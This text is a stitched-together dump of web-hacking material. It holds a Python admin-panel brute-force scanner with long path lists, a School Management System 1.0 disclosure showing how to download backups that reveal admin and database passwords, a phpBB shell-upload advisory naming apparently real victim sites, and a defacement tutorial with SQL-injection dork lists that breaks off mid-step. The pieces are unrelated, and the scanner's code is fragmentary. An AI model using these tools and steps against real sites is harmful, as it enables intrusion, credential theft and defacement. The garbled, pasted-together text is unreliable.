'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',

'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',

'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',

'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',

'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',

'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',

'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',

'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',

'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',

'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',

'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',

'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',

'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',

'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',

'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']

asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',

'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',

'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',

'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',

'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',

'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',

'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',

'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',

'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',

'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',

'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',

'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',

'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',

'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',

'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',

'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']

cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',

'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',

'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',

'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',

'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',

'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',

'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',

'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',

'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',

'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',

'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',

'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',

'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',

'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',

'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',

'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']

js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',

'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',

'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',

'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',

'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',

'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',

'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',

'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',

'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',

'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',

'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',

'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',

'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',

'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',

'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',

'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js']

cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',

'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',

'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',

'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',

'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',

'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',

'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',

'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',

'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',

'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',

'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',

'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',

'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',

'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',

'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',

'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']

brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',

'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',

'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',

'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',

'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',

'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',

'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',

'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',

'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',

'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',

'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',

'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',

'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',

'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',

'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',

'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',

'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']

try:

site = raw_input("Web Site for Scan?: ")

site = site.replace("http://","")

print ("\tChecking website " + site + "...")

conn = httplib.HTTPConnection(site)

conn.connect()

print "\t[$] Yes... Server is Online."

except (httplib.HTTPResponse, socket.error) as Exit:

raw_input("\t [!] Oops Error occured, Server offline or invalid URL")

exit()

print "Enter site source code:"

print "1 PHP"

print "2 ASP"

print "3 CFM"

print "4 JS"

print "5 CGI"

print "6 BRF"

print "\nPress 1 and 'Enter key' for Select PHP\n"

code=input("> ")

if code==1:

print("\t [+] Scanning " + site + "...\n\n")

for admin in php:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("[/] The Game Over; Press Enter to Exit")

if code==2:

print("\t [+] Scanning " + site + "...\n\n")

for admin in asp:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("The Game Over; Press Enter to Exit")

if code==3:

print("\t [+] Scanning " + site + "...\n\n")

for admin in cfm:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("The Game Over; Press Enter to Exit")

if code==4:

print("\t [+] Scanning " + site + "...\n\n")

for admin in js:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("The Game Over; Press Enter to Exit")

if code==5:

print("\t [+] Scanning " + site + "...\n\n")

for admin in cgi:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("The Game Over; Press Enter to Exit")

if code==6:

print("\t [+] Scanning " + site + "...\n\n")

for admin in brf:

admin = admin.replace("\n","")

admin = "/" + admin

host = site + admin

print ("\t [#] Checking " + host + "...")

connection = httplib.HTTPConnection(site)

connection.request("GET",admin)

response = connection.getresponse()

var2 = var2 + 1

if response.status == 200:

var1 = var1 + 1

print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")

raw_input("Press enter to continue scanning.\n")

elif response.status == 404:

var2 = var2

elif response.status == 302:

print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")

else:

print "%s %s %s" % (host, " Interesting response:", response.status)

connection.close()

print("\n\nCompleted \n")

print var1, " Admin pages found"

print var2, " total pages scanned"

raw_input("The Game Over; Press Enter to Exit")

except (httplib.HTTPResponse, socket.error):

print "\n\t[!] Session Cancelled; Error occured. Check internet settings"

except (KeyboardInterrupt, SystemExit):

print "\n\t[!] Session cancelled"

School Management System 1.0 Password / Backup Disclosure

#######################################################
# Exploit Title: School Management System v 1.0 Remote Create SQL & Files Backup
# Date: 08/08/2012
# Author: L0n3ly-H34rT
# Homepage: http://se3c.tk/
# Contact: l0n3ly_h34rt@hotmail.com
# Software Link: http://nigeriasocialforum.org/DSM1.0.zip### Tested on: Linux/Windows                                                                           ####################################################
# P.O.C :
1- If you run this file in browser e.g. :
http://127.0.0.1/DSM1.0/backup/processbackup.php
is create backup in same folder e.g. :
http://127.0.0.1/DSM1.0/backup/RecordManager.sql
when you download it , search in file "INSERT INTO adminstaff" and you see like this :
INSERT INTO adminstaff VALUES("System","Admin","","","7","5","","","","","","","","000","","","17","2007-05-22","17","000000","Admin","Active","","0","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","Grant","000","System.A","0","2012-08-08 11:52:13","","Grant","Grant","");
Username : System.A
Password : 000000
------------------------------------------------------
2- If you run this file in browser e.g. :
http://127.0.0.1/DSM1.0/createzip.php
is create backup in same folder e.g. :
http://127.0.0.1/DSM1.0/backup/RecordManager.zip
when you download it , extract that file and see this file "Connections/drsa.php" to get database information:
$hostname_drsa = "localhost:3306";$database_drsa = "dsm";$username_drsa = "root";$password_drsa = "000000";
# Greetz to my friendz

phpBB uploadpic.php Shell Upload

##################################################################

0101010101----010101010101010
01 01------0101       0101
01 01------0101       0101
01 01------0101       0101
01 01------0101       0101
01 01------0101       0101
01 01------0101     0101
01 01------0101010101
01 01------0101     010
01 01------0101      010
01 01------0101       010
01 01------0101        010
01 01------0101         010
0101010101----0101          010

##################################################################

[+] Exploit Title : PHP BB Forum Remote File Uploader

[+] Google Dork   : inurl:uploadpic.php intext:Powered by phpBB

[+] Autor         : Mr.XpR

[+] Version       : All Version

[+] Contact : No0PM@yahoo.com

[+] Researcher Team : IRaNHaCK Security Team

[+] Bug Level     : RFU (Sql)

[+] Test          : 7 , Linux Back Track

##################################################################

[+]Exploit

   [-] http://Site.CoM/uploadpic.php

[+]INfo Uploadshell (( Sh3ll.php.jpg )) or change log with TamperData To Sh3ll.php

[+]Load Shell

   [-] http://xxxxxxxx.de/[folder]/Sh3ll.php

[+]Example :

   [-] http://crazy-growers.de/uploadpic.php
   [-] http://www.povej.net/forum/uploadpic.php
   [-] More In Google ...

Persian Gulf For Ever - Tnx To all Persian Hackerz

Bax:

Siamak Black - UnknowN - Farbod ezrael - Hellboy - Samim.s - Sianor - IRH - IRBH - IRIST - All IRanian Hackers

13 STEPS TO HACKING A WEBSITE OR DEFACEMENT

Now Our todays Discussion is on " How to Deface Websites using the SQL injection and PHP shell code scripting ".. Today I will show you the 100% working method for Hacking Websites and then Defacing them...

Note: I and This Blog is Not responsible for any Misuse of these Tutorials. These are Just for Educational Purposes...So Don't Misuse Them!

FIRST OF ALL YOU SHOULD KNOW WHAT IS DEFACEMENT??

Defacing a website simply means that we replace the index.html file of a site by our file. Now all the Users that open it will see our Page(i.e being uploaded by us).

For Defacing a website, three things that you need Most are:

1. SQL Injection(For analyzing website loops)

2. Admin Password

3. Shell Script (for getting Admin Controls)

Now Lets Start the Tutorial:

First of all I would Like to say that I have took some part of SQL injection Tutorial from my previous posts and a site http://www.milw0rm.com/ .Most of the Part is written by me so if you have any doubts I will clear them....

1. Finding the Target and the Admin Password

First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..

Examples: Open the Google and copy paste these queries...

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

Here are some More Queries (use them without quotation marks)..

"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID

Now The Admin password Hacking procedure starts:
You can also refer to my previous post of hacking websites:

HACKING WEBSITES : HOW TO HACK WEBSITES BY USING SQL INJECTION

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar that means the Site is vulnerable to SQL injection.

2). Find the number of columns

